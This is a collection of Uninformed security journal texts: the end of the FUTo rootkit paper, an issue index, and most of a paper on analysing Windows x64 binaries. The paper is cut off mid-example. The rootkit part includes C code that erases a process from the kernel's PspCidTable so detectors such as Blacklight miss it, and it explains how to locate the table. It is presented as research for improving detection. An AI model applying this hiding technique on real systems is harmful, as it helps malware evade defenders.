DWORD HandleCount;
DWORD Flags;
};
Windows offers a variety of non-exported functions to manipulate and retrieve
information from the PspCidTable. These include:
- [ExCreateHandleTable] creates non-process handle tables. The
objects within all handle tables except the PspCidTable are pointers
to object headers and not the address of the objects themselves.
- [ExDupHandleTable] is called when spawning a process.
- [ExSweepHandleTable] is used for process rundown.
- [ExDestroyHandleTable] is called when a process is exiting.
- [ExCreateHandle] creates new handle table entries.
- [ExChangeHandle] is used to change the access mask on a handle.
- [ExDestroyHandle] implements the functionality of CloseHandle.
- [ExMapHandleToPointer] returns the address of the object corresponding to the handle.
- [ExReferenceHandleDebugInfo] is used for tracing handles.
- [ExSnapShotHandleTables] is used for handle searchers (for example in oh.exe).
Below is code that uses non-exported functions to remove a process
object from the PspCidTable. It uses hardcoded addresses for the
non-exported functions necessary; however, a rootkit could find these
function addresses dynamically.
typedef PHANDLE_TABLE_ENTRY (*ExMapHandleToPointerFUNC)
( IN PHANDLE_TABLE HandleTable,
IN HANDLE ProcessId);
void HideFromBlacklight(DWORD eproc)
{
PHANDLE_TABLE_ENTRY CidEntry;
ExMapHandleToPointerFUNC map;
ExUnlockHandleTableEntryFUNC umap;
PEPROCESS p;
CLIENT_ID ClientId;
map = (ExMapHandleToPointerFUNC)0x80493285;
CidEntry = map((PHANDLE_TABLE)0x8188d7c8,
LongToHandle( *((DWORD*)(eproc+PIDOFFSET)) ) );
if(CidEntry != NULL)
{
CidEntry->Object = 0;
}
return;
}
Since the job of the PspCidTable is to keep track of all the processes
and threads, it is logical that a rootkit detector could use the
PspCidTable to find hidden processes. However, relying on a single data
structure is not a very robust algorithm. If a rootkit alters this one
data structure, the operating system and other programs will have no
idea that the hidden process exists. New rootkit detection algorithms
should be devised that have overlapping dependencies so that a single
change will not go undetected.
4) FUTo
To demonstrate the weaknesses in the algorithms currently used by
rootkit detection software such as Blacklight and Icesword, the authors
have created FUTo. FUTo is a new version of the FU rootkit. FUTo has
the added ability to manipulate the PspCidTable without using any
function calls. It uses DKOM techniques to hide particular objects
within the PspCidTable.
There were some design considerations when implementing the new features
in FUTo. The first was that, like the ExMapHandleXXX functions, the
PspCidTable is not exported by the kernel. In order to overcome this,
FUTo automatically detects the PspCidTable by finding the
PsLookupProcessByProcessId function and disassembling it looking for the
first function call. At the time of this writing, the first function
call is always to ExMapHandleToPointer. ExMapHandleToPointer takes the
PspCidTable as its first parameter. Using this knowledge, it is fairly
straightforward to find the PspCidTable.
PsLookupProcessByProcessId:
mov edi, edi
push ebp
mov ebp, esp
push ebx
push esi
mov eax, large fs:124h
push [ebp+arg_4]
mov esi, eax
dec dword ptr [esi+0D4h]
push PspCidTable
call ExMapHandleToPointer
A more robust method to find the PspCidTable could be written, as this
algorithm will fail if even simple compiler optimizations are made on
the kernel. Opc0de wrote a more robust method to detect non-exported
variables like PspCidTable, PspActiveProcessHead, PspLoadedModuleList,
etc. Opc0de's method does not require memory scanning like the method
currently used in FUTo. Instead, Opc0de found that the KdVersionBlock
field in the Processor Control Region structure points to a
KDDEBUGGER_DATA32 structure, which looks like this:
typedef struct _KDDEBUGGER_DATA32 {
DBGKD_DEBUG_DATA_HEADER32 Header;
ULONG KernBase;
ULONG BreakpointWithStatus; // address of breakpoint
ULONG SavedContext;
USHORT ThCallbackStack; // offset in thread data
USHORT NextCallback; // saved pointer to next callback frame
USHORT FramePointer; // saved frame pointer
USHORT PaeEnabled:1;
ULONG KiCallUserMode; // kernel routine
ULONG KeUserCallbackDispatcher; // address in ntdll
ULONG PsLoadedModuleList;
ULONG PsActiveProcessHead;
ULONG PspCidTable;
ULONG ExpSystemResourcesList;
ULONG ExpPagedPoolDescriptor;
ULONG ExpNumberOfPagedPools;
[...]
ULONG KdPrintCircularBuffer;
ULONG KdPrintCircularBufferEnd;
ULONG KdPrintWritePointer;
ULONG KdPrintRolloverCount;
ULONG MmLoadedUserImageList;
} KDDEBUGGER_DATA32, *PKDDEBUGGER_DATA32;
As the reader can see, the structure contains pointers to many of the
commonly needed non-exported variables. This is one more robust method
of finding the PspCidTable and other variables like it.
The second design consideration was a little more troubling. When FUTo
removes an object from the PspCidTable, the HANDLE_ENTRY is replaced with
NULLs representing the fact that the process "does not exist." The
problem then occurs when the process that is hidden (and has no
PspCidTable entries) is closed. When the system tries to close the
process, it will index into the PspCidTable and dereference a null
object causing a blue screen. The solution to this problem is simple but
not elegant. First, FUTo sets up a process notify routine by calling
PsSetCreateProcessNotifyRoutine. The callback function will be invoked
whenever a process is created, but more importantly it will be called
whenever a process is deleted. The callback executes before the hidden
process is terminated; therefore, it gets called before the system
crashes. When FUTo deletes the indexes containing objects that point
to the rogue process, it saves the value of the HANDLE_ENTRYs and
their indexes for later use. When the hidden process terminates, FUTo
restores the objects before the close completes, allowing the system
to dereference valid objects.
5) Conclusion
The catch phrase in 2005 was, ``We are raising the bar [again] for
rootkit detection''. Hopefully the reader has walked away with a better
understanding of how the top rootkit detection programs are detecting
hidden processes and how they can be improved. Some readers may ask,
"What can I do?" The simple solution is not to connect to the
Internet, but using a combination of Blacklight, IceSword and Rootkit
Revealer will greatly improve your chances of staying rootkit free.
A new tool called RAIDE (Rootkit Analysis Identification Elimination)
will be unveiled in the coming months at Blackhat Amsterdam. This new
tool does not suffer from the problems brought forth here.
Bibliography
Blacklight Homepage. F-Secure Blacklight
http://www.f-secure.com/blacklight/
FU Project Page. FU
http://www.rootkit.com/project.php?id=12
IceSword Homepage. IceSword
http://www.xfocus.net/tools/200505/1032.html
LordPE Homepage. LordPE Info
http://mitglied.lycos.de/yoda2k/LordPE/info.htm
Opc0de. 2005. How to get some hidden kernel variables without scanning
http://www.rootkit.com/newsread.php?newsid=101
Rohitabs API Monitor. API Monitor - Spy on API calls
http://www.rohitab.com/apimonitor/
Russinovich, Solomon. Microsoft Windows Internals Fourth Edition.
Silberman. RAIDE:Rootkit Analysis Identification Elimination
http://www.blackhat.com/html/bh-europe-06/bh-eu-06-speakers.html
uninformed/3.txt Normal file
Engineering in Reverse
Bypassing PatchGuard on Windows x64
skape & Skywing
The version of the Windows kernel that runs on the x64 platform has introduced a new feature, nicknamed PatchGuard, that is intended to prevent both malicious software and third-party vendors from modifying certain critical operating system structures. These structures include things like specific system images, the SSDT, the IDT, the GDT, and certain critical processor MSRs. This feature is intended to ensure kernel stability by preventing uncondoned behavior, such as hooking. However, it also has the side effect of preventing legitimate products from working properly. For that reason, this paper will serve as an in-depth analysis of PatchGuard's inner workings with an eye toward techniques that can be used to bypass it. Possible solutions will also be proposed for the bypass techniques that are suggested.
pdf | txt | html
Exploitation Technology
Windows Kernel-mode Payload Fundamentals
bugcheck & skape
This paper discusses the theoretical and practical implementations of kernel-mode payloads on Windows. At the time of this writing, kernel-mode research is generally regarded as the realm of a few, but it is hoped that documents such as this one will encourage a thoughtful progression of the subject matter. To that point, this paper will describe some of the general techniques and algorithms that may be useful when implementing kernel-mode payloads. Furthermore, the anatomy of a kernel-mode payload will be broken down into four distinct units, known as payload components, and explained in detail. In the end, the reader should walk away with a concrete understanding of the way in which kernel-mode payloads operate on Windows.
pdf | txt | html
Fuzzing
Analyzing Common Binary Parser Mistakes
Orlando Padilla
With just about one file format bug being consistently released on a weekly basis over the past six to twelve months, one can only hope developers would look and learn. The reality of it all is unfortunate; no one cares enough. These bugs have been around for some time now, but have only recently gained media attention due to the large number of vulnerabilities being released. Researchers have been finding more elaborate and passive attack vectors for these bugs, some of which can even leverage a remote compromise.
pdf | txt | code.tgz | html
General Research
Attacking NTLM with Precomputed Hashtables
Warlord
Breaking encrypted passwords has been of interest to hackers for a long time, and protecting them has always been one of the biggest security problems operating systems have faced, with Microsoft's Windows being no exception. Due to errors in the design of the password encryption scheme, especially in the LanMan(LM) scheme, Windows has a bad track in this field of information security. Especially in the last couple of years, where the outdated DES encryption algorithm that LanMan is based on faced more and more processing power in the average household, combined with ever increasing harddisk size, made it crystal clear that LanMan nowadays is not just outdated, but even antiquated.
pdf | txt | html
Linux Improvised Userland Scheduler Virus
Izik
This paper discusses the combination of a userland scheduler and runtime process infection for a virus. These two concepts complete each other. The runtime process infection opens the door to invading into other processes, and the userland scheduler provides a way to make the injected code coexist with the original process code. This allows the virus to remain stealthy and active inside an infected process.
pdf | txt | html
Rootkit Technology
FUTo
Peter Silberman & C.H.A.O.S.
Since the introduction of FU, the rootkit world has moved away from implementing system hooks to hide their presence. Because of this change in offense, a new defense had to be developed. The new algorithms used by rootkit detectors, such as BlackLight, attempt to find what the rootkit is hiding instead of simply detecting the presence of the rootkit's hooks. This paper will discuss an algorithm that is used by both Blacklight and IceSword to detect hidden processes. This paper will also document current weaknesses in the rootkit detection field and introduce a more complete stealth technique implemented as a prototype in FUTo.
pdf | txt | code.tgz | html
uninformed/4.4.txt Normal file
Improving Automated Analysis of Windows x64 Binaries
April 2006
skape
mmiller@hick.org
1) Foreword
Abstract: As Windows x64 becomes a more prominent platform, it will
become necessary to develop techniques that improve the binary analysis
process. In particular, automated techniques that can be performed
prior to doing code or data flow analysis can be useful in getting a
better understanding for how a binary operates. To that point, this
paper gives a brief explanation of some of the changes that have been
made to support Windows x64 binaries. From there, a few basic
techniques are illustrated that can be used to improve the process of
identifying functions, annotating their stack frames, and describing
their exception handler relationships. Source code to an example IDA
plugin is also included that shows how these techniques can be
implemented.
Thanks: The author would like to thank bugcheck, sh0k, jt, spoonm, and
Skywing.
Update: The article in MSDN magazine by Matt Pietrek was
published after this article was written. However, it contains a
lot of useful information and touches on many of the same topics
that this article covers in the background chapter. The article can
be found here:
http://msdn.microsoft.com/msdnmag/issues/06/05/x64/default.aspx.
With that, on with the show
2) Introduction
The demand for techniques that can be used to improve the analysis
process of Windows x64 binaries will only increase as the Windows x64
platform becomes more accepted and used in the market place. There is a
deluge of useful information surrounding techniques that can be used to
perform code and data flow analysis that is also applicable to the x64
architecture. However, techniques that can be used to better annotate
and streamline the initial analysis phases, such as identifying
functions and describing their stack frames, are still a ripe area for
improvement at the time of this writing. For that reason, this paper
will start by describing some of the changes that have been made to
support Windows x64 binaries. This background information is useful
because it serves as a basis for understanding a few basic techniques
that may be used to improve some of the initial analysis phases. During
the course of this paper, the term Windows x64 binary will simply be
reduced to x64 binary in the interest of brevity.
3) Background
Prior to diving into some of the analysis techniques that can be
performed on x64 binaries, it's first necessary to learn a bit about
some of the changes that were made to support the x64 architecture.
This chapter will give a very brief explanation of some of the things
that have been introduced, but will by no means attempt to act as an
authoritative reference.
3.1) PE32+ Image File Format
The image file format for the x64 platform is known as PE32+. As one
would expect, the file format is derived from the PE file format with
only very slight modifications. For instance, 64-bit binaries contain
an IMAGE_OPTIONAL_HEADER64 rather than an IMAGE_OPTIONAL_HEADER. The
differences between these two structures are described in the table
below:
Field | PE | PE32+
-------------------+-------+------------------------------
BaseOfData | ULONG | Removed from structure
ImageBase | ULONG | ULONGLONG
SizeOfStackReserve | ULONG | ULONGLONG
SizeOfStackCommit | ULONG | ULONGLONG
SizeOfHeapReserve | ULONG | ULONGLONG
SizeOfHeapCommit | ULONG | ULONGLONG
-------------------+-------+------------------------------
In general, any structure attribute in the PE image that made reference
to a 32-bit virtual address directly rather than through an RVA (Relative
Virtual Address) has been expanded to a 64-bit attribute in PE32+. Other
examples of this include the IMAGE_TLS_DIRECTORY structure and the
IMAGE_LOAD_CONFIG_DIRECTORY structure.
With the exception of certain field offsets in specific structures,
the PE32+ image file format is largely backward compatible with PE
both in use and in form.
3.2) Calling Convention
The calling convention used on x64 is much simpler than those used for
x86. Unlike x86, where calling conventions like stdcall, cdecl, and
fastcall are found, the x64 platform has only one calling convention.
The calling convention that it uses is a derivative of fastcall where
the first four parameters of a function are passed by register and any
remaining parameters are passed through the stack. Each parameter is 64
bits wide (8 bytes). The first four parameters are passed through the
RCX, RDX, R8, and R9 registers, respectively. For scenarios where
parameters are passed by value or are otherwise too large to fit into
one of the 64-bit registers, appropriate steps are taken as documented
in [4].
3.2.1) Stack Frame Layout
The stack frame layout for functions on x64 is very similar to x86, but
with a few key differences. Just like x86, the stack frame on x64 is
divided into three parts: parameters, return address, and locals. These
three parts are explained individually below. One of the important
principles to understand when it comes to x64 stack frames is that the
stack does not fluctuate throughout the course of a given function. In
fact, the stack pointer is only permitted to change in the context of a
function prologue. Note that things like alloca are handled in a special
manner[7]. Parameters are not pushed and popped from the stack. Instead,
stack space is pre-allocated for all of the arguments that would be
passed to child functions. This is done, in part, to make it easier
to unwind call stacks in the event of an exception. The table below
describes a typical stack frame:
+-------------------------+
| Stack parameter area |
+-------------------------+
| Register parameter area |
+-------------------------+
| Return address |
+-------------------------+
| Locals |
+-------------------------+
== Parameters
The calling convention for functions on x64 dictates that the first four
parameters are passed via register with any remaining parameters,
starting with parameter five, spilling to the stack. Given that the
fifth parameter is the first parameter passed by the stack, one would
think that the fifth parameter would be the value immediately adjacent
to the return address on the stack, but this is not the case. Instead,
if a given function calls other functions, that function is required to
allocate stack space for the parameters that are passed by register.
This has the effect of making the area of the stack immediately
adjacent to the return address 0x20 bytes of uninitialized storage for
the parameters passed by register, followed immediately by any
parameters that spill to the stack (starting with parameter five). The
area of storage allocated on the stack for the
register parameters is known as the register parameter area whereas the
area of the stack for parameters that spill onto the stack is known as
the stack parameter area. The table below illustrates what the
parameter portion of a stack frame would look like after making a call
to a function:
+-------------------------+
| Parameter 6 |
+-------------------------+
| Parameter 5 |
+-------------------------+
| Parameter 4 (R9 Home) |
+-------------------------+
| Parameter 3 (R8 Home) |
+-------------------------+
| Parameter 2 (RDX Home) |
+-------------------------+
| Parameter 1 (RCX Home) |
+-------------------------+
| Return address |
+-------------------------+
To emphasize further, the register parameter area is always allocated,
even if the function being called has fewer than four arguments. This
area of the stack is effectively owned by the called function, and as
such can be used for volatile storage during the course of the function
call. In particular, this area is commonly used to persist the values
of register parameters. This area is also referred to as the ``home''
address for register parameters. However, it can also be used to save
non-volatile registers. To someone familiar with x86 it may seem
slightly odd to see functions modifying areas of the stack beyond the
return address. The key is to remember that the 0x20 bytes immediately
adjacent to the return address are owned by the called function. One
important side effect of this requirement is that if a function calls
other functions, the calling function's minimum stack allocation will be
0x20 bytes. This accounts for the register parameter area that will be
used by called functions.
The obvious question to ask at this point is why it's the caller's
responsibility to allocate stack space for use by the called function.
There are a few different reasons for this. Perhaps most importantly,
it makes it possible for the called function to take the address of a
parameter that's passed via a register. Furthermore, the address that
is returned for the parameter must be at a location that is contiguous
in relation to the other parameters. This is particularly necessary for
variadic functions, which require a contiguous list of parameters, but
may also be necessary for applications that make assumptions about being
able to reference parameters in relation to one another by address.
Invalidating this assumption would introduce source compatibility
problems.
For more information on parameter passing, refer to the MSDN
documentation[4,7].
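To see why parameter contiguity matters, consider a variadic function
in plain C. This is an illustrative sketch (not taken from the source):
on x64 it only works because the compiler spills RCX, RDX, R8, and R9
into the caller-allocated home area, so that va_arg can walk all of the
arguments as one contiguous list.

```c
#include <stdarg.h>

/* Illustrative sketch: a variadic function whose correctness depends on
   the compiler presenting all arguments as one contiguous list. On x64,
   spilling the register parameters into the caller-allocated home area
   is what makes this possible; portable C hides that detail. */
static int sum_ints(int count, ...)
{
    va_list ap;
    int total = 0;

    va_start(ap, count);
    for (int i = 0; i < count; i++)
        total += va_arg(ap, int);  /* walks the contiguous parameter list */
    va_end(ap);

    return total;
}
```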
== Return Address
Due to the fact that pointers are 64 bits wide on x64, the return
address location on the stack is eight bytes instead of four.
== Locals
The locals portion of a function's stack frame encompasses both local
variables and saved non-volatile registers. For x64, the general
purpose registers described as non-volatile are RBP, RBX, RDI, RSI, and
R12 through R15[5].
3.3) Exception Handling on x64
On x86, exception handling is accomplished through the adding and
removing of exception registration records on a per-thread basis. When
a function is entered that makes use of an exception handler, it
constructs an exception registration record on the stack that is
composed of an exception handler (a function pointer), and a pointer to
the next element in the exception handler list. This list of exception
registration records is stored relative to fs:[0]. When an exception
occurs, the exception dispatcher walks the list of exception handlers
and calls each one, checking to see if they are capable of handling the
exception that occurred. While this approach works perfectly fine,
Microsoft realized that there were better ways to go about it. First of
all, the adding and removing of exception registration records that are
static in the context of an execution path adds needless execution
overhead. Secondly, the security implications of storing a function
pointer on the stack have been made very obvious, especially in the case
where that function pointer can be called after an exception is
generated (such as an access violation). Finally, the process of
unwinding call frames is muddled with limitations, thus making it a more
complicated process than it might otherwise need to be[6].
With these things in mind, Microsoft completely revamped the way
exception handling is accomplished on x64. The major changes center
around the approaches Microsoft has taken to solve the three major
deficiencies found on x86. First, Microsoft solved the execution time
overhead issue of adding and removing exception handlers by moving all
of the static exception handling information into a static location in
the binary. This location, known as the .pdata section, is described by
the PE32+'s Exception Directory. The structure of this section will be
described in the exception directory subsection. By eliminating the
need to add and remove exception handlers on the fly, Microsoft has also
eliminated the security issue found on x86 with regard to overwriting
the function pointer of an exception handler. Perhaps most importantly,
the process involved in unwinding call frames has been drastically
improved through the formalization of the frame unwinding process. This
will be discussed in the subsection on unwind information.
3.3.1) Exception Directory
The Exception Directory of a PE32+ binary is used to convey the complete
list of functions that could be found in a stack frame during an unwind
operation. These functions are known as non-leaf functions, and they
are qualified as such if they either allocate space on the stack or call
other functions. The IMAGE_RUNTIME_FUNCTION_ENTRY data structure is used
to describe the non-leaf functions, as shown below[1]:
typedef struct _IMAGE_RUNTIME_FUNCTION_ENTRY {
ULONG BeginAddress;
ULONG EndAddress;
ULONG UnwindInfoAddress;
} IMAGE_RUNTIME_FUNCTION_ENTRY, *PIMAGE_RUNTIME_FUNCTION_ENTRY;
The BeginAddress and EndAddress attributes are RVAs that represent the
range of the non-leaf function. The UnwindInfoAddress will be discussed
in more detail in the following subsection on unwind information. The
Exception directory itself is merely an array of
IMAGE_RUNTIME_FUNCTION_ENTRY structures. When an exception occurs, the
exception dispatcher will enumerate the array of runtime function
entries until it finds the non-leaf function associated with the address
it's searching for (typically a return address).
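The dispatcher's search can be sketched as a linear scan over the entry
array. The structure below mirrors IMAGE_RUNTIME_FUNCTION_ENTRY; the
sample table and the helper name are invented for illustration.

```c
#include <stddef.h>

/* Mirrors IMAGE_RUNTIME_FUNCTION_ENTRY; field and helper names, along
   with the sample table contents, are illustrative only. */
struct runtime_function {
    unsigned long begin_address;       /* RVA of function start        */
    unsigned long end_address;         /* RVA one past function end    */
    unsigned long unwind_info_address; /* RVA of the UNWIND_INFO block */
};

/* Return the entry whose [begin, end) range covers rva, or NULL --
   roughly what the exception dispatcher does with a return address. */
static const struct runtime_function *
find_runtime_function(const struct runtime_function *table, size_t count,
                      unsigned long rva)
{
    for (size_t i = 0; i < count; i++)
        if (rva >= table[i].begin_address && rva < table[i].end_address)
            return &table[i];
    return NULL;
}

/* Invented sample "exception directory" with two non-leaf functions. */
static const struct runtime_function sample_pdata[] = {
    { 0x1000, 0x1080, 0x5000 },
    { 0x1080, 0x1200, 0x5010 },
};
```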
3.3.2) Unwind Information
For the purpose of unwinding call frames and dispatching exceptions,
each non-leaf function has some non-zero amount of unwind information
associated with it. This association is made through the
UnwindInfoAddress attribute of the IMAGE_RUNTIME_FUNCTION_ENTRY
structure. The UnwindInfoAddress itself is an RVA that points to an
UNWIND_INFO structure which is defined as[8]:
typedef struct _UNWIND_INFO {
UBYTE Version : 3;
UBYTE Flags : 5;
UBYTE SizeOfProlog;
UBYTE CountOfCodes;
UBYTE FrameRegister : 4;
UBYTE FrameOffset : 4;
UNWIND_CODE UnwindCode[1];
/* UNWIND_CODE MoreUnwindCode[((CountOfCodes + 1) & ~1) - 1];
* union {
* OPTIONAL ULONG ExceptionHandler;
* OPTIONAL ULONG FunctionEntry;
* };
* OPTIONAL ULONG ExceptionData[]; */
} UNWIND_INFO, *PUNWIND_INFO;
This structure, at a very high level, describes a non-leaf function in
terms of its prologue size and frame register usage. Furthermore, it
describes the way in which the stack is set up when the prologue for
this non-leaf function is executed. This is provided through an array
of codes as accessed through the UnwindCode array. This array is
composed of UNWIND_CODE structures which are defined as[8]:
typedef union _UNWIND_CODE {
struct {
UBYTE CodeOffset;
UBYTE UnwindOp : 4;
UBYTE OpInfo : 4;
};
USHORT FrameOffset;
} UNWIND_CODE, *PUNWIND_CODE;
In order to properly unwind a frame, the exception dispatcher needs to
be aware of the amount of stack space allocated in that frame, the
locations of saved non-volatile registers, and anything else that has to
do with the stack. This information is necessary in order to be able to
restore the caller's stack frame when an unwind operation occurs. By
having the compiler keep track of this information at link time, it's
possible to emulate the unwind process by inverting the operations
described in the unwind code array for a given non-leaf function.
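Since the union overlays a USHORT on the three bit-fields, a single
16-bit slot can be unpacked with shifts and masks. The helpers below
are a sketch assuming the little-endian layout MSVC produces for the
structure above.

```c
/* Unpack one 16-bit UNWIND_CODE slot, assuming little-endian layout:
   low byte = CodeOffset, next 4 bits = UnwindOp, top 4 bits = OpInfo.
   Helper names are invented for illustration. */
static unsigned char slot_code_offset(unsigned short slot)
{
    return (unsigned char)(slot & 0xFF);
}

static unsigned char slot_unwind_op(unsigned short slot)
{
    return (unsigned char)((slot >> 8) & 0x0F);
}

static unsigned char slot_op_info(unsigned short slot)
{
    return (unsigned char)((slot >> 12) & 0x0F);
}
```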
Aside from conveying stack frame set up, the UNWIND_INFO structure may
also describe exception handling information, such as the exception
handler that is to be called if an exception occurs. This information
is conveyed through the ExceptionHandler and ExceptionData attributes of
the structure, which exist only if the UNW_FLAG_EHANDLER or
UNW_FLAG_UHANDLER flag is set in the
Flags field.
For more details on the format and use of these structures for unwinding
as well as a complete description of the unwind process, please refer to
the MSDN documentation[2].
4) Analysis Techniques
In order to improve the analysis of x64 binaries, it is important to try
to identify techniques that can aid in the identification or extraction
of useful information from the binary in an automated fashion. This
chapter will focus on a handful of simple techniques that can be used to
better annotate or describe the behavior of an x64 binary. These
techniques intentionally do not cover the analysis of code or data flow
operations. Such techniques are outside of the scope of this paper.
4.1) Exception Directory Enumeration
Given the explanation of the Exception Directory found within PE32+
images and its application to the exception dispatching process, it can
be seen that x64 binaries have a lot of useful meta-information stored
within them. Given that this information is just sitting there waiting
to be used, it makes sense to try to take advantage of it in ways that
make it possible to better annotate or understand an x64 binary. The
following subsections will describe different things that can be
discovered by digging deeper into the contents of the exception
directory.
4.1.1) Functions
One of the most obvious uses for the information stored in the exception
directory is that it can be used to discover all of the non-leaf
functions in a binary. This is cool because it works regardless of
whether or not you actually have symbols for the binary, thus providing
an easy technique for identifying the majority of the functions in a
binary. The process taken to do this is to simply enumerate the array
of IMAGE_RUNTIME_FUNCTION_ENTRY structures stored within the exception
directory. The BeginAddress attribute of each entry marks the starting
point of a non-leaf function. There's a catch, though. Not all of the
runtime function entries are actually associated with the entry point of
a function. The fact of the matter is that entries can also be
associated with various portions of an actual function where stack
modifications are deferred until necessary. In these cases, the unwind
information associated with the runtime function entry is chained with
another runtime function entry.
The chaining of runtime function entries is documented as being
indicated through the UNW_FLAG_CHAININFO flag in the Flags attribute of
the UNWIND_INFO structure. If this flag is set, the area of memory
immediately following the last UNWIND_CODE in the UNWIND_INFO structure
is an IMAGE_RUNTIME_FUNCTION_ENTRY structure. The UnwindInfoAddress of
this structure indicates the chained unwind information. Aside from
this, chaining can also be indicated through an undocumented flag that
is stored in the least-significant bit of the UnwindInfoAddress. If the
least-significant bit is set, then it is implied that the runtime
function entry is directly chained to the IMAGE_RUNTIME_FUNCTION_ENTRY
structure that is found at the RVA conveyed by the UnwindInfoAddress
attribute with the least significant bit masked off. The reason
chaining can be indicated in this fashion is because it is a requirement
that unwind information be four byte aligned.
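A sketch of the check, assuming the RVA came from the UnwindInfoAddress
attribute of a runtime function entry (helper names are invented):

```c
/* Undocumented chaining flag: since unwind information is 4-byte
   aligned, the low bit of UnwindInfoAddress is free to mark direct
   chaining to another IMAGE_RUNTIME_FUNCTION_ENTRY. */
static int unwind_rva_is_chained(unsigned long unwind_info_rva)
{
    return (unwind_info_rva & 1) != 0;
}

static unsigned long unwind_rva_target(unsigned long unwind_info_rva)
{
    return unwind_info_rva & ~1UL;  /* mask the flag off to get the RVA */
}
```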
With chaining in mind, it is safe to assume that a runtime function
entry is associated with the entry point of a function if its unwind
information is not chained. This makes it possible to deterministically
identify the entry point of all of the non-leaf functions. From there,
it should be possible to identify all of the leaf functions through
calls that are made to them by non-leaf functions. This requires code
flow analysis, though.
4.1.2) Stack Frame Annotation
The unwind information associated with each non-leaf function
contains lots of useful meta-information about the structure of the
stack. It provides information about the amount of stack space
allocated, the location of saved non-volatile registers, and whether or
not a frame register is used and what relation it has to the rest of the
stack. This information is also described in terms of the location of
the instruction that actually performs the operation associated with the
task. Take the following unwind information obtained through dumpbin
/unwindinfo as an example:
0000060C 00006E50 00006FF0 000081FC _resetstkoflw
Unwind version: 1
Unwind flags: None
Size of prologue: 0x47
Count of codes: 18
Frame register: rbp
Frame offset: 0x20
Unwind codes:
3C: SAVE_NONVOL, register=r15 offset=0x98
38: SAVE_NONVOL, register=r14 offset=0xA0
31: SAVE_NONVOL, register=r13 offset=0xA8
2A: SAVE_NONVOL, register=r12 offset=0xD8
23: SAVE_NONVOL, register=rdi offset=0xD0
1C: SAVE_NONVOL, register=rsi offset=0xC8
15: SAVE_NONVOL, register=rbx offset=0xC0
0E: SET_FPREG, register=rbp, offset=0x20
09: ALLOC_LARGE, size=0xB0
02: PUSH_NONVOL, register=rbp
First and foremost, one can immediately see that the size of the
prologue used in the resetstkoflw function is 0x47 bytes. This prologue
accounts for all of the operations described in the unwind codes array.
Furthermore, one can also tell that the function uses a frame pointer,
as conveyed through rbp, and that the frame pointer offset is 0x20 bytes
relative to the current stack pointer at the time the frame pointer
register is established.
As one would expect with an unwind operation, the unwind codes
themselves are stored in the opposite order of which they are executed.
This is necessary because of the effect on the stack each unwind code
can have. If they are processed in the wrong order, then the unwind
operation will get invalid data. For example, the value obtained
through a pop rbp instruction will differ depending on whether or not it
is done before or after an add rsp, 0xb0.
For the purposes of annotation, however, the important thing to keep in
mind is how all of the useful information can be extracted. In this
case, it is possible to take all of the information the unwind codes
provide and break it down into a definition of the stack frame layout
for a function. This can be accomplished by processing the unwind codes
in the order that they would be executed rather than the order that they
appear in the array. There's one important thing to keep in mind when
doing this. Since unwind information can be chained, it is a
requirement that the full chain of unwind codes be processed in
execution order. This can be accomplished by walking the chain of
unwind information and building an execution order list of all of the
unwind codes.
Once the execution order list of unwind codes is collected, the next
step is to simply enumerate each code, checking to see what operation it
performs and building out the stack frame across each iteration. Prior
to enumerating each code, the state of the stack pointer should be
initialized to 0 to indicate an empty stack frame. As data is allocated
on the stack, the stack pointer should be adjusted by the appropriate
amount. The actions that need to be taken for each unwind operation
that directly affect the stack pointer are described below.
1. UWOP_PUSH_NONVOL
When a non-volatile register is pushed onto the stack, such as
through a push rbp, the current stack pointer needs to be
decremented by 8 bytes.
2. UWOP_ALLOC_LARGE and UWOP_ALLOC_SMALL
When stack space is allocated, the current stack pointer needs to
be adjusted by the amount indicated.
3. UWOP_SET_FPREG
When a frame pointer is defined, its offset relative to the base of
the stack should be saved using the current value of the stack
pointer.
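The three rules above can be sketched as a small interpreter that
replays a simplified code list in execution order. The op encoding and
sample data below are simplified for illustration; real UNWIND_CODE
slots pack allocation sizes into OpInfo and trailing USHORTs.

```c
#include <stddef.h>

/* Simplified stand-ins for the SP-affecting unwind operations. */
enum simple_op { OP_PUSH_NONVOL, OP_ALLOC, OP_SET_FPREG };

struct simple_code {
    enum simple_op op;
    unsigned long  size;  /* allocation size for OP_ALLOC, else 0 */
};

/* Replay codes in execution order, returning the total number of bytes
   the prologue subtracts from RSP. SAVE_NONVOL-style ops are omitted
   since they do not move the stack pointer. */
static unsigned long replay_prologue(const struct simple_code *codes,
                                     size_t count)
{
    unsigned long sp = 0;
    for (size_t i = 0; i < count; i++) {
        switch (codes[i].op) {
        case OP_PUSH_NONVOL: sp += 8;             break; /* push reg   */
        case OP_ALLOC:       sp += codes[i].size; break; /* sub rsp, n */
        case OP_SET_FPREG:   /* rbp = rsp + FrameOffset; SP unchanged */
                             break;
        }
    }
    return sp;
}

/* The SP-affecting subset of the _resetstkoflw codes shown earlier,
   listed in execution order. */
static const struct simple_code resetstkoflw_codes[] = {
    { OP_PUSH_NONVOL, 0    },  /* 02: PUSH_NONVOL rbp     */
    { OP_ALLOC,       0xB0 },  /* 09: ALLOC_LARGE 0xB0    */
    { OP_SET_FPREG,   0    },  /* 0E: SET_FPREG rbp, 0x20 */
};
```

Replaying the codes yields a total allocation of 0xB8 bytes (8 for the
push of rbp plus the 0xB0 explicit allocation), which matches what one
would compute by hand from the dumpbin listing.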
As the enumeration of the unwind codes occurs, it is also possible to annotate
the different locations on the stack where non-volatile registers are
preserved. For instance, given the example unwind information above, it
is known that the R15 register is preserved at [rsp + 0x98]. Therefore,
we can annotate this location as [rsp + SavedR15].
Beyond annotating preserved register locations on the stack, we can also
annotate the instructions that perform operations that affect the stack.
For instance, when a non-volatile register is pushed, such as through
push rbp, we can annotate the instruction that performs that operation
as preserving rbp on the stack. The location of the instruction that's
associated with the operation can be determined by taking the
BeginAddress associated with the unwind information and adding it to the
CodeOffset attribute of the UNWIND_CODE that is being processed. It is
important to note, however, that the CodeOffset attribute actually
points to the first byte of the instruction immediately following the
one that performs the actual operation, so it is necessary to back track
in order to determine the start of the instruction that actually
performs the operation.
As a result of this analysis, one can take the prologue of the
resetstkoflw function and automatically convert it from:
.text:100006E50 push rbp
.text:100006E52 sub rsp, 0B0h
.text:100006E59 lea rbp, [rsp+0B0h+var_90]
.text:100006E5E mov [rbp+0A0h], rbx
.text:100006E65 mov [rbp+0A8h], rsi
.text:100006E6C mov [rbp+0B0h], rdi
.text:100006E73 mov [rbp+0B8h], r12
.text:100006E7A mov [rbp+88h], r13
.text:100006E81 mov [rbp+80h], r14
.text:100006E88 mov [rbp+78h], r15
to a version with better annotation:
.text:100006E50 push rbp ; SavedRBP
